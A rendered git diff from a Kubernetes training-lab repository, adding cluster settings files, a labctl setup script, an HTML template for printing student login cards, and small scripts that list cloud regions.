USER_PASSWORD=
|
||||
|
||||
STEPS="terraform stage2"
|
||||
22
prepare-labs/settings/kubernetes.env
Normal file
22
prepare-labs/settings/kubernetes.env
Normal file
@@ -0,0 +1,22 @@
|
||||
CLUSTERSIZE=4
|
||||
|
||||
CLUSTERPREFIX=node
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
23
prepare-labs/settings/largekube.env
Normal file
23
prepare-labs/settings/largekube.env
Normal file
@@ -0,0 +1,23 @@
|
||||
CLUSTERSIZE=10
|
||||
export TF_VAR_node_size=GP1.M
|
||||
|
||||
CLUSTERPREFIX=node
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
4
prepare-labs/settings/mk8s.env
Normal file
4
prepare-labs/settings/mk8s.env
Normal file
@@ -0,0 +1,4 @@
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=
|
||||
|
||||
STEPS="terraform stage2"
|
||||
22
prepare-labs/settings/portal.env
Normal file
22
prepare-labs/settings/portal.env
Normal file
@@ -0,0 +1,22 @@
|
||||
#export TF_VAR_node_size=GP4.4
|
||||
#export TF_VAR_node_size=g6-standard-6
|
||||
#export TF_VAR_node_size=m7i.xlarge
|
||||
|
||||
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=CHANGEME
|
||||
|
||||
USER_LOGIN=portal
|
||||
USER_PASSWORD=CHANGEME
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
ips
|
||||
"
|
||||
40
prepare-labs/setup-admin-clusters.sh
Executable file
40
prepare-labs/setup-admin-clusters.sh
Executable file
@@ -0,0 +1,40 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
PROVIDER=openstack/enix # aws also works
|
||||
STUDENTS=2
|
||||
#export TF_VAR_location=eu-north-1
|
||||
export TF_VAR_node_size=S
|
||||
|
||||
SETTINGS=admin-monokube
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
--provider $PROVIDER \
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
|
||||
SETTINGS=admin-polykube
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
--provider $PROVIDER \
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
|
||||
SETTINGS=admin-oldversion
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
--provider $PROVIDER \
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
--provider $PROVIDER \
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
1
prepare-labs/tags
Symbolic link
1
prepare-labs/tags
Symbolic link
@@ -0,0 +1 @@
|
||||
terraform/tags
|
||||
237
prepare-labs/templates/cards.html
Normal file
237
prepare-labs/templates/cards.html
Normal file
@@ -0,0 +1,237 @@
|
||||
{#
|
||||
The variables below can be customized here directly, or in your
|
||||
settings.yaml file. Any variable in settings.yaml will be exposed
|
||||
in here as well.
|
||||
#}
|
||||
|
||||
{%- set url = url
|
||||
| default("http://FIXME.container.training/") -%}
|
||||
{%- set pagesize = pagesize
|
||||
| default(10) -%}
|
||||
{%- set lang = lang
|
||||
| default("en") -%}
|
||||
{%- set event = event
|
||||
| default("training session") -%}
|
||||
{%- set backside = backside
|
||||
| default(False) -%}
|
||||
{%- set image = image
|
||||
| default(False) -%}
|
||||
{%- set clusternumber = clusternumber
|
||||
| default(None) -%}
|
||||
{%- set thing = thing
|
||||
| default("lab environment") -%}
|
||||
|
||||
{%- if lang == "en" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
{{ thing }} for this {{ event }}.
|
||||
You can connect to it with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ thing }} pour cette formation.
|
||||
Vous pouvez vous y connecter
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head>
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
{% if paper_size == "A4" %}
|
||||
@page {
|
||||
size: A4; /* Change from the default size of A4 */
|
||||
margin: 0.5cm; /* Set margin on each page */
|
||||
}
|
||||
body {
|
||||
/* this is A4 minus 0.5cm margins */
|
||||
width: 20cm;
|
||||
height: 28.7cm;
|
||||
}
|
||||
{% elif paper_size == "Letter" %}
|
||||
@page {
|
||||
size: Letter; /* 8.5in x 11in */
|
||||
}
|
||||
body {
|
||||
width: 6.75in; /* two cards wide */
|
||||
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
|
||||
margin-top: 0.1875in; /* (11in - 5 cards)/2 */
|
||||
}
|
||||
{% endif %}
|
||||
|
||||
body, table {
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
td:first-child {
|
||||
width: 10.5em;
|
||||
}
|
||||
|
||||
div.card {
|
||||
float: left;
|
||||
border: 0.01in dotted black;
|
||||
/*
|
||||
columns * (width+left+right) < 100%
|
||||
height: 33%;
|
||||
width: 24.8%;
|
||||
width: 33%;
|
||||
*/
|
||||
width: 3.355in; /* 3.375in minus two 0.01in borders */
|
||||
height: 2.105in; /* 2.125in minus two 0.01in borders */
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.8em;
|
||||
}
|
||||
|
||||
div.front {
|
||||
{% if image %}
|
||||
background-image: url("{{ image }}");
|
||||
background-repeat: no-repeat;
|
||||
background-size: 1in;
|
||||
background-position-x: 2.8in;
|
||||
background-position-y: center;
|
||||
{% endif %}
|
||||
}
|
||||
|
||||
span.scale {
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
.qrcode img {
|
||||
height: 5.8em;
|
||||
padding: 1em 1em 0.5em 1em;
|
||||
float: left;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 0;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript" src="qrcode.min.js"></script>
|
||||
<script type="text/javascript">
|
||||
function qrcodes() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("qrcode"),
|
||||
(e, index) => {
|
||||
new QRCode(e, {
|
||||
text: "{{ qrcode }}",
|
||||
correctLevel: QRCode.CorrectLevel.L
|
||||
});
|
||||
}
|
||||
);
|
||||
}
|
||||
|
||||
function scale() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("scale"),
|
||||
(e, index) => {
|
||||
var text_width = e.getBoundingClientRect().width;
|
||||
var box_width = e.parentElement.getBoundingClientRect().width;
|
||||
var percent = 100 * box_width / text_width + "%";
|
||||
e.style.fontSize = percent;
|
||||
}
|
||||
);
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="qrcodes(); scale();">
|
||||
{% for login in logins %}
|
||||
<div class="card front">
|
||||
<p>{{ intro }}</p>
|
||||
<p>
|
||||
<table>
|
||||
<tr>
|
||||
<td>login:</td>
|
||||
<td>password:</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="logpass">{{ login.login }}</td>
|
||||
<td class="logpass">{{ login.password }}</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>IP address:</td>
|
||||
{% if login.port %}
|
||||
<td>port:</td>
|
||||
{% endif %}
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
|
||||
{% if login.port %}
|
||||
<td class="logpass">{{ login.port }}</td>
|
||||
{% endif %}
|
||||
</tr>
|
||||
</table>
|
||||
</p>
|
||||
<p>
|
||||
{% if url %}
|
||||
{{ slides_are_at }}
|
||||
<p>
|
||||
<span class="scale">{{ url }}</span>
|
||||
</p>
|
||||
{% endif %}
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="card back">
|
||||
{{ backside }}
|
||||
{#
|
||||
<p>Thanks for attending
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during CONFERENCE in Month YYYY!</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team, in person or
|
||||
online, with custom courses of
|
||||
any length and any level.
|
||||
</p>
|
||||
{% if qrcode %}
|
||||
<p>If you're interested, please scan that QR code to contact me:</p>
|
||||
<span class="qrcode"></span>
|
||||
{% else %}
|
||||
<p>If you're interested, you can contact me at:</p>
|
||||
{% endif %}
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
#}
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
19
prepare-labs/templates/cards.yaml
Normal file
19
prepare-labs/templates/cards.yaml
Normal file
@@ -0,0 +1,19 @@
|
||||
cards_template: cards.html
|
||||
paper_size: Letter
|
||||
url: https://2024-11-qconsf.container.training
|
||||
event: workshop
|
||||
backside: |
|
||||
<div class="qrcode"></div>
|
||||
<p>
|
||||
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
|
||||
</p>
|
||||
<p>
|
||||
<b>This QR code will give you my contact info</b> as well as a link to a feedback form.
|
||||
</p>
|
||||
<p>
|
||||
If you liked this workshop, I can train your team, in person or online, with custom
|
||||
courses of any length and any level, on Docker, Kubernetes, and MLops.
|
||||
</p>
|
||||
qrcode: https://2024-11-qconsf.container.training/#contact
|
||||
thing: Kubernetes cluster
|
||||
image: logo-kubernetes.png
|
||||
|
Can't render this file because it contains an unexpected character in line 1 and column 42.
|
4
prepare-labs/terraform/list-locations/azure
Executable file
4
prepare-labs/terraform/list-locations/azure
Executable file
@@ -0,0 +1,4 @@
|
||||
#!/bin/sh
|
||||
az account list-locations -o table \
|
||||
--query "sort_by([?metadata.regionType == 'Physical'], ®ionalDisplayName)[]
|
||||
.{ displayName: displayName, regionalDisplayName: regionalDisplayName }"
|
||||
2
prepare-labs/terraform/list-locations/civo
Executable file
2
prepare-labs/terraform/list-locations/civo
Executable file
@@ -0,0 +1,2 @@
|
||||
#!/bin/sh
|
||||
civo region ls
|
||||
2
prepare-labs/terraform/list-locations/digitalocean
Executable file
2
prepare-labs/terraform/list-locations/digitalocean
Executable file
@@ -0,0 +1,2 @@
|
||||
#!/bin/sh
|
||||
doctl compute region list
|
||||
2
prepare-labs/terraform/list-locations/exoscale
Executable file
2
prepare-labs/terraform/list-locations/exoscale
Executable file
@@ -0,0 +1,2 @@
|
||||
#!/bin/sh
|
||||
exo zone
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user